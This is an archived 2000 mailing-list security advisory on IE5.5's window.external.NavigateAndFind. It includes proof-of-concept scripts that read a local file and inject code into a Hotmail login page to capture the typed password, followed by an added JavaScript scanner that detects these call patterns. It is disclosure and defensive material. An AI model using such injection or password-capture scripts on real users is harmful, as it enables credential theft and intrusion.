Computer Security
[EN] securityvulns.ru

From: Alp Sinan <alp_(at)_UK2.NET>
Date: 06.10.2000
Subject: IE5.5 window.externalNavigateAndFind security vulnerability....

Multiple security vulnerabilities were found in the
window.external.NavigateAndFind function in IE5.5.
After the most recent patches are applied, the
vulnerabilities seem to persist. Actually, there are no
current issues discussed on the Microsoft website.
Microsoft has been notified about the problem via
email. Until now, no response has appeared.
I wanted to inform security-concerned people about
the problem.

Vulnerability 1: window.external.NavigateAndFind
function can access local files provided that the local
file name and path are known.

The code (the I in the script tag replaced with
lowercase):

<A href="javascr!pt:LinkClicked()">Show local file's Content</A>
<SCRiPT>
function LinkClicked()
{
b=window.open("file://C:/test.txt","local")
setTimeout('Sniff()',1000);
}
function Sniff(){
window.external.NavigateAndFind("javascript:alert(document.body.innerText);","b","local");
}
</SCRiPT>
demonstration:
http://www.horoznet.com/AlpSinan/navAL.htm


Vulnerability 2: window.external.NavigateAndFind
function can access other windows' DOM.
Editing the opened window's content, and therefore code
injection, is possible.
The code:

<A href="javascript:LinkClicked()">Go to Hotmail </A>
<scrIpt>
function LinkClicked()
{
a=window.open("http://lc2.law5.hotmail.passport.com/cgi-bin/login","new")
setTimeout('Spoof()',20000);// you may modify the timeout....
}
function Spoof(){
window.external.NavigateAndFind("javascript:document.write(''+document.body.outerHTML+'<scrIpt>document.passwordform.onsubmit=ShowPass;function ShowPass(){alert(\"Your Password is:  \n\"+document.passwordform.passwd.value)};window.focus();</sc'+'rIpt>');alert('The code has been injected right now.');","a","new");
}
</scrIpt>
demonstration:
http://www.horoznet.com/AlpSinan/navCI.htm

Vulnerability 3:
IE5.5 can execute the JavaScript or VBScript content
of plain text files.
demonstration:
http://www.horoznet.com/AlpSinan/execlocal.htm

Precautions or workarounds might be disabling
JavaScript or using caution while clicking the links in
untrusted webpages as well as popup windows.

Alp Sinan
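
Added example, not part of the original advisory or of any vendor tooling: a static content check that a proxy or mail filter could run over HTML to flag the two call patterns the demonstrations above depend on, a script-scheme URL passed to NavigateAndFind and window.open pointed at a file:// URL. The function names, rule names and sample markup are constructed for illustration.

```javascript
// Added example: static check for the call patterns in the advisory's demos.
const SCRIPT_SCHEME = /^(javascript|vbscript):/i;
const FILE_SCHEME = /^file:/i;

// Return the first string-literal argument of a call, or null if the
// argument is not a literal (tolerates line breaks inside the literal).
function firstStringArg(text) {
  const m = /^\s*(["'])((?:\\[\s\S]|(?!\1)[^\\])*)\1/.exec(text);
  return m ? m[2] : null;
}

// URL parsers ignore tab/CR/LF inside a URL and leading control characters,
// so strip them before testing the scheme.
function normalizeUrl(u) {
  return u.replace(/[\t\r\n]/g, "").replace(/^[\x00-\x20]+/, "");
}

function scanHtml(html) {
  const findings = [];
  const calls = /\b(NavigateAndFind|window\s*\.\s*open)\s*\(/gi;
  let m;
  while ((m = calls.exec(html)) !== null) {
    const isNav = /NavigateAndFind/i.test(m[1]);
    const arg = firstStringArg(html.slice(calls.lastIndex));
    if (arg === null) {
      // URL built at run time: cannot be judged statically, report for review
      if (isNav) findings.push({ rule: "navigateandfind-nonliteral-url", offset: m.index });
      continue;
    }
    const url = normalizeUrl(arg);
    if (isNav && SCRIPT_SCHEME.test(url)) {
      findings.push({ rule: "navigateandfind-script-url", offset: m.index });
    } else if (!isNav && FILE_SCHEME.test(url)) {
      findings.push({ rule: "window-open-file-url", offset: m.index });
    }
  }
  return findings;
}

// Constructed sample markup (benign payloads), one case per line.
const SAMPLE = [
  '<script>w=window.open("file://C:/test.txt","local")</script>',
  '<scrIpt>window.external.NavigateAndFind\n("java\tscript:void(0)","x","local")</scrIpt>',
  '<script>window.external.NavigateAndFind(target,"x","local")</script>',
  '<script>window.external.NavigateAndFind("http://example.com/","term","_main")</script>',
  '<script>window.open("http://example.com/","new")</script>',
].join("\n");

console.log(scanHtml(SAMPLE).map((f) => f.rule));
```

The check is a heuristic over literal arguments only; a URL assembled at run time is reported under its own rule for manual review rather than classified.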



